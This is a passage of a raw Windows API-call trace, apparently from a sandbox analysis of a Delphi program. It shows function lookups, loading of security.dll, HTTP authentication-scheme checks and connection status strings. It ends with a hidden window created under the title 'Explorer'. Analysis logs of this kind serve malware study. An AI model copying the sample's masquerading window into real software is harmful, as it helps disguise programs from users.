returned 0xc04 [0039.525] GetCurrentThreadId () returned 0xc04 [0039.525] GetCurrentThreadId () returned 0xc04 [0039.525] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cecb49, cbMultiByte=9, lpWideCharStr=0x71dfa24, cchWideChar=10 | out: lpWideCharStr="TMenuItem") returned 9 [0039.525] CharLowerBuffW (in: lpsz="TMenuItem", cchLength=0x9 | out: lpsz="tmenuitem") returned 0x9 [0039.525] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6c2033b, cbMultiByte=10, lpWideCharStr=0x71dfa4c, cchWideChar=11 | out: lpWideCharStr="TComponent") returned 10 [0039.525] CharLowerBuffW (in: lpsz="TComponent", cchLength=0xa | out: lpsz="tcomponent") returned 0xa [0039.525] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6c155fd, cbMultiByte=11, lpWideCharStr=0x71dfa74, cchWideChar=12 | out: lpWideCharStr="TPersistent") returned 11 [0039.525] CharLowerBuffW (in: lpsz="TPersistent", cchLength=0xb | out: lpsz="tpersistent") returned 0xb [0039.525] CharLowerBuffW (in: lpsz="TPersistent", cchLength=0xb | out: lpsz="tpersistent") returned 0xb [0039.525] GetCurrentThreadId () returned 0xc04 [0039.526] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x74110000 [0039.526] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeFlatSB", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0039.526] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeFlatSB", cchWideChar=16, lpMultiByteStr=0x71dfa9c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeFlatSB", lpUsedDefaultChar=0x0) returned 16 [0039.526] GetProcAddress (hModule=0x74110000, lpProcName="InitializeFlatSB") returned 0x741ef803 [0039.526] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="UninitializeFlatSB", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0039.526] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="UninitializeFlatSB", cchWideChar=18, lpMultiByteStr=0x71dfa9c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UninitializeFlatSB", lpUsedDefaultChar=0x0) returned 18 [0039.527] GetProcAddress (hModule=0x74110000, lpProcName="UninitializeFlatSB") returned 0x7411d1ea [0039.527] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollProp", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0039.527] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollProp", cchWideChar=20, lpMultiByteStr=0x71dfa9c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_GetScrollProp", lpUsedDefaultChar=0x0) returned 20 [0039.527] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_GetScrollProp") returned 0x741ef81f [0039.527] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollProp", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0039.527] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollProp", cchWideChar=20, lpMultiByteStr=0x71dfa9c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_SetScrollProp", lpUsedDefaultChar=0x0) returned 20 [0039.528] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_SetScrollProp") returned 0x741907d0 [0039.528] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_EnableScrollBar", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0039.528] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_EnableScrollBar", cchWideChar=22, lpMultiByteStr=0x71dfa9c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_EnableScrollBar", lpUsedDefaultChar=0x0) returned 22 [0039.528] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_EnableScrollBar") returned 0x741ef84b [0039.528] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_ShowScrollBar", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0039.528] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_ShowScrollBar", cchWideChar=20, lpMultiByteStr=0x71dfa9c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_ShowScrollBar", lpUsedDefaultChar=0x0) returned 20 [0039.529] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_ShowScrollBar") returned 0x741ef83a [0039.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollRange", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0039.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollRange", cchWideChar=21, lpMultiByteStr=0x71dfa9c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_GetScrollRange", lpUsedDefaultChar=0x0) returned 21 [0039.529] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_GetScrollRange") returned 0x741ef829 [0039.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollInfo", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0039.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollInfo", cchWideChar=20, lpMultiByteStr=0x71dfa9c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_GetScrollInfo", lpUsedDefaultChar=0x0) returned 20 [0039.530] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_GetScrollInfo") returned 0x741908b6 [0039.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollPos", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0039.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollPos", cchWideChar=19, lpMultiByteStr=0x71dfa9c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_GetScrollPos", lpUsedDefaultChar=0x0) returned 19 [0039.530] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_GetScrollPos") returned 0x741ef80e [0039.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollPos", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0039.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollPos", cchWideChar=19, lpMultiByteStr=0x71dfa9c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_SetScrollPos", lpUsedDefaultChar=0x0) returned 19 [0039.531] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_SetScrollPos") returned 0x74190894 [0039.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollInfo", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0039.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollInfo", cchWideChar=20, lpMultiByteStr=0x71dfa9c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_SetScrollInfo", lpUsedDefaultChar=0x0) returned 20 [0039.531] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_SetScrollInfo") returned 0x741908c7 [0039.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollRange", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0039.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollRange", cchWideChar=21, lpMultiByteStr=0x71dfa9c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_SetScrollRange", lpUsedDefaultChar=0x0) returned 21 [0039.532] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_SetScrollRange") returned 0x741908a5 [0039.532] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76ca0000 [0039.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetLayeredWindowAttributes", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0039.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetLayeredWindowAttributes", cchWideChar=26, lpMultiByteStr=0x71e6abc, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetLayeredWindowAttributes", lpUsedDefaultChar=0x0) returned 26 [0039.533] GetProcAddress (hModule=0x76ca0000, lpProcName="SetLayeredWindowAttributes") returned 0x76caa6dc [0039.533] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0bf [0039.533] GetModuleHandleW (lpModuleName="USER32.DLL") returned 0x76ca0000 [0039.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsHungAppWindow", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0039.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsHungAppWindow", cchWideChar=15, lpMultiByteStr=0x71c9e7c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsHungAppWindow", lpUsedDefaultChar=0x0) returned 15 [0039.534] GetProcAddress (hModule=0x76ca0000, lpProcName="IsHungAppWindow") returned 0x76cd7195 [0039.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HungWindowFromGhostWindow", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0039.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HungWindowFromGhostWindow", cchWideChar=25, lpMultiByteStr=0x71e6abc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HungWindowFromGhostWindow", lpUsedDefaultChar=0x0) returned 25 [0039.534] GetProcAddress (hModule=0x76ca0000, lpProcName="HungWindowFromGhostWindow") returned 0x76cc61f5 [0039.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GhostWindowFromHungWindow", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0039.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GhostWindowFromHungWindow", cchWideChar=25, lpMultiByteStr=0x71e6abc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GhostWindowFromHungWindow", lpUsedDefaultChar=0x0) returned 25 [0039.535] GetProcAddress (hModule=0x76ca0000, lpProcName="GhostWindowFromHungWindow") returned 0x76caa561 [0039.535] LoadStringW (in: hInstance=0x6ba0000, uID=0xff13, lpBuffer=0x68fd830, cchBufferMax=4096 | out: lpBuffer="Metafiles") returned 0x9 [0039.535] CharLowerBuffW (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3 [0039.535] LoadStringW (in: hInstance=0x6ba0000, uID=0xff14, lpBuffer=0x68fd830, cchBufferMax=4096 | out: lpBuffer="Enhanced Metafiles") returned 0x12 [0039.535] CharLowerBuffW (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3 [0039.535] LoadStringW (in: hInstance=0x6ba0000, uID=0xff15, lpBuffer=0x68fd830, cchBufferMax=4096 | out: lpBuffer="Icons") returned 0x5 [0039.535] CharLowerBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0039.535] LoadStringW (in: hInstance=0x6ba0000, uID=0xff17, lpBuffer=0x68fd830, cchBufferMax=4096 | out: lpBuffer="TIFF Images") returned 0xb [0039.535] CharLowerBuffW (in: lpsz="tiff", cchLength=0x4 | out: lpsz="tiff") returned 0x4 [0039.535] LoadStringW (in: hInstance=0x6ba0000, uID=0xff17, lpBuffer=0x68fd830, cchBufferMax=4096 | out: lpBuffer="TIFF Images") returned 0xb [0039.535] CharLowerBuffW (in: lpsz="tif", cchLength=0x3 | out: lpsz="tif") returned 0x3 [0039.535] LoadStringW (in: hInstance=0x6ba0000, uID=0xff16, lpBuffer=0x68fd830, cchBufferMax=4096 | out: lpBuffer="Bitmaps") returned 0x7 [0039.535] CharLowerBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3 [0039.535] SetErrorMode (uMode=0x8000) returned 0x1 [0039.535] LoadLibraryW (lpLibFileName="olepro32.dll") returned 0x6e100000 [0039.583] SetErrorMode (uMode=0x1) returned 0x8000 [0039.583] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleCreatePropertyFrame", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0039.583] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleCreatePropertyFrame", cchWideChar=22, lpMultiByteStr=0x71dfb8c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OleCreatePropertyFrame", lpUsedDefaultChar=0x0) returned 22 [0039.583] GetProcAddress (hModule=0x6e100000, lpProcName="OleCreatePropertyFrame") returned 0x6e1020ea [0039.583] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleCreateFontIndirect", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0039.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleCreateFontIndirect", cchWideChar=21, lpMultiByteStr=0x71dfb8c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OleCreateFontIndirect", lpUsedDefaultChar=0x0) returned 21 [0039.584] GetProcAddress (hModule=0x6e100000, lpProcName="OleCreateFontIndirect") returned 0x6e1020b7 [0039.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleCreatePictureIndirect", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0039.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleCreatePictureIndirect", cchWideChar=24, lpMultiByteStr=0x71e6abc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OleCreatePictureIndirect", lpUsedDefaultChar=0x0) returned 24 [0039.584] GetProcAddress (hModule=0x6e100000, lpProcName="OleCreatePictureIndirect") returned 0x6e1020c8 [0039.585] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleLoadPicture", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0039.585] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleLoadPicture", cchWideChar=14, lpMultiByteStr=0x71c9edc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OleLoadPicture", lpUsedDefaultChar=0x0) returned 14 [0039.585] GetProcAddress (hModule=0x6e100000, lpProcName="OleLoadPicture") returned 0x6e1020d9 [0039.585] GetCurrentThreadId () returned 0xc04 [0039.585] GetCurrentThreadId () returned 0xc04 [0039.585] CharLowerBuffW (in: lpsz="TPersistent", cchLength=0xb | out: lpsz="tpersistent") returned 0xb [0039.585] CharLowerBuffW (in: lpsz="TComponent", cchLength=0xa | out: lpsz="tcomponent") returned 0xa [0039.585] GetCurrentThreadId () returned 0xc04 [0039.585] GetCurrentThreadId () returned 0xc04 [0039.585] GetCurrentThreadId () returned 0xc04 [0039.585] CharLowerBuffW (in: lpsz="TPersistent", cchLength=0xb | out: lpsz="tpersistent") returned 0xb [0039.585] CharLowerBuffW (in: lpsz="TComponent", cchLength=0xa | out: lpsz="tcomponent") returned 0xa [0039.585] GetCurrentThreadId () returned 0xc04 [0039.585] GetDC (hWnd=0x0) returned 0x1901023f [0039.585] GetDeviceCaps (hdc=0x1901023f, index=12) returned 32 [0039.586] GetDeviceCaps (hdc=0x1901023f, index=14) returned 1 [0039.586] ReleaseDC (hWnd=0x0, hDC=0x1901023f) returned 1 [0039.586] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeda, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="JPEG Image File") returned 0xf [0039.586] CharLowerBuffW (in: lpsz="jpeg", cchLength=0x4 | out: lpsz="jpeg") returned 0x4 [0039.586] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeda, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="JPEG Image File") returned 0xf [0039.586] CharLowerBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="jpg") returned 0x3 [0039.586] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x75900000 [0039.586] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetFileSizeEx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0039.586] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetFileSizeEx", cchWideChar=13, lpMultiByteStr=0x71c9efc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetFileSizeEx", lpUsedDefaultChar=0x0) returned 13 [0039.587] GetProcAddress (hModule=0x75900000, lpProcName="GetFileSizeEx") returned 0x759459ef [0039.587] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ff0000 [0039.587] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x718842c | out: lpBuffer="C:\\Users\\DSSDPM~1\\AppData\\Local\\Temp\\") returned 0x25 [0039.587] LoadStringW (in: hInstance=0x6ba0000, uID=0xfec9, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="%s") returned 0x2 [0039.587] LoadStringW (in: hInstance=0x6ba0000, uID=0xfec9, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="%s") returned 0x2 [0039.587] LoadStringW (in: hInstance=0x6ba0000, uID=0xfec9, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="%s") returned 0x2 [0039.587] LoadStringW (in: hInstance=0x6ba0000, uID=0xfec9, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="%s") returned 0x2 [0039.587] LoadStringW (in: hInstance=0x6ba0000, uID=0xfec8, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Disconnected.") returned 0xd [0039.587] LoadStringW (in: hInstance=0x6ba0000, uID=0xfec7, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Disconnecting.") returned 0xe [0039.587] LoadStringW (in: hInstance=0x6ba0000, uID=0xfec6, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Connected.") returned 0xa [0039.587] LoadStringW (in: hInstance=0x6ba0000, uID=0xfec5, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Connecting to %s.") returned 0x11 [0039.587] LoadStringW (in: hInstance=0x6ba0000, uID=0xfec4, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Resolving hostname %s.") returned 0x16 [0039.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Basic", cchCount1=5, lpString2="NTLM", cchCount2=4) returned 1 [0039.588] SetErrorMode (uMode=0x8000) returned 0x1 [0039.588] LoadLibraryW (lpLibFileName="security.dll") returned 0x6f9b0000 [0039.613] SetErrorMode (uMode=0x1) returned 0x8000 [0039.613] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitSecurityInterfaceW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0039.613] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitSecurityInterfaceW", cchWideChar=22, lpMultiByteStr=0x71dfc54, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitSecurityInterfaceW", lpUsedDefaultChar=0x0) returned 22 [0039.614] GetProcAddress (hModule=0x6f9b0000, lpProcName="InitSecurityInterfaceW") returned 0x75285b53 [0039.615] InitSecurityInterfaceW () returned 0x75298300 [0039.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Basic", cchCount1=5, lpString2="NTLM", cchCount2=4) returned 1 [0039.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTLM", cchCount1=4, lpString2="NTLM", cchCount2=4) returned 2 [0039.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Basic", cchCount1=5, lpString2="Negotiate", cchCount2=9) returned 1 [0039.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTLM", cchCount1=4, lpString2="Negotiate", cchCount2=9) returned 3 [0039.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Basic", cchCount1=5, lpString2="Digest", cchCount2=6) returned 1 [0039.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTLM", cchCount1=4, lpString2="Digest", cchCount2=6) returned 3 [0039.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Negotiate", cchCount1=9, lpString2="Digest", cchCount2=6) returned 3 [0039.615] GetCurrentThreadId () returned 0xc04 [0039.615] GetCurrentThreadId () returned 0xc04 [0039.615] CharLowerBuffW (in: lpsz="TPersistent", cchLength=0xb | out: lpsz="tpersistent") returned 0xb [0039.615] CharLowerBuffW (in: lpsz="TComponent", cchLength=0xa | out: lpsz="tcomponent") returned 0xa [0039.615] GetCurrentThreadId () returned 0xc04 [0039.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff74d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ü\x98\x13I\x0bÞ\x0e´àí\x90¬|ƾƾ¬|\x0e6eo7\x07\x9b²\x981\x1dǦã\x183¢×ø¼", lpUsedDefaultChar=0x0) returned 0 [0039.616] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TApplication", lpWndClass=0x68ff8a8 | out: lpWndClass=0x68ff8a8) returned 0 [0039.616] RegisterClassW (lpWndClass=0x6de8f70) returned 0xc10c [0039.616] GetSystemMetrics (nIndex=0) returned 1440 [0039.616] GetSystemMetrics (nIndex=1) returned 900 [0039.616] CreateWindowExW (dwExStyle=0x80, lpClassName="TApplication", lpWindowName="Explorer", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x70144 [0039.617] LoadLibraryA (lpLibFileName="wtsapi32.dll") returned 0x73c50000 [0039.617] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x13fae8 [0039.618] GetProcAddress (hModule=0x73c50000, lpProcName="WTSRegisterSessionNotification") returned 0x73c51cbc [0039.618] WTSRegisterSessionNotification (hWnd=0x70144, dwFlags=0x0) returned 1 [0039.618] LoadLibraryA (lpLibFileName="uxtheme.dll") returned 0x74090000 [0039.619] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x13f9c8 [0039.619] GetProcAddress (hModule=0x74090000, lpProcName="BufferedPaintInit") returned 0x7409940e [0039.619] BufferedPaintInit () returned 0x0 [0039.619] SetWindowLongW (hWnd=0x70144, nIndex=-4, dwNewLong=83759061) returned 112917644 [0039.619] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0039.620] SendMessageW (hWnd=0x70144, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0039.620] DefWindowProcW (hWnd=0x70144, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0039.623] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0039.623] SetClassLongW (hWnd=0x70144, nIndex=-14, dwNewLong=65575) returned 0x0 [0039.624] GetSystemMenu (hWnd=0x70144, bRevert=0) returned 0xb0123 [0039.624] DeleteMenu (hMenu=0xb0123, uPosition=0xf030, uFlags=0x0) returned 1 [0039.624] DeleteMenu (hMenu=0xb0123, uPosition=0xf000, uFlags=0x0) returned 1 [0039.624] DeleteMenu (hMenu=0xb0123, uPosition=0xf010, uFlags=0x0) returned 1 [0039.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff6dd, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.625] GetCurrentThreadId () returned 0xc04 [0039.625] ResetEvent (hEvent=0x6b4) returned 1 [0039.625] GetCurrentThreadId () returned 0xc04 [0039.625] GetCurrentThreadId () returned 0xc04 [0039.625] GetCurrentThreadId () returned 0xc04 [0039.625] ResetEvent (hEvent=0x6b4) returned 1 [0039.625] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x68ff7c0, fWinIni=0x0 | out: pvParam=0x68ff7c0) returned 1 [0039.625] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x68ff7c0, fWinIni=0x0 | out: pvParam=0x68ff7c0) returned 1 [0039.625] GetSystemMetrics (nIndex=49) returned 16 [0039.625] GetSystemMetrics (nIndex=50) returned 16 [0039.625] GetCurrentThreadId () returned 0xc04 [0039.625] GetCurrentThreadId () returned 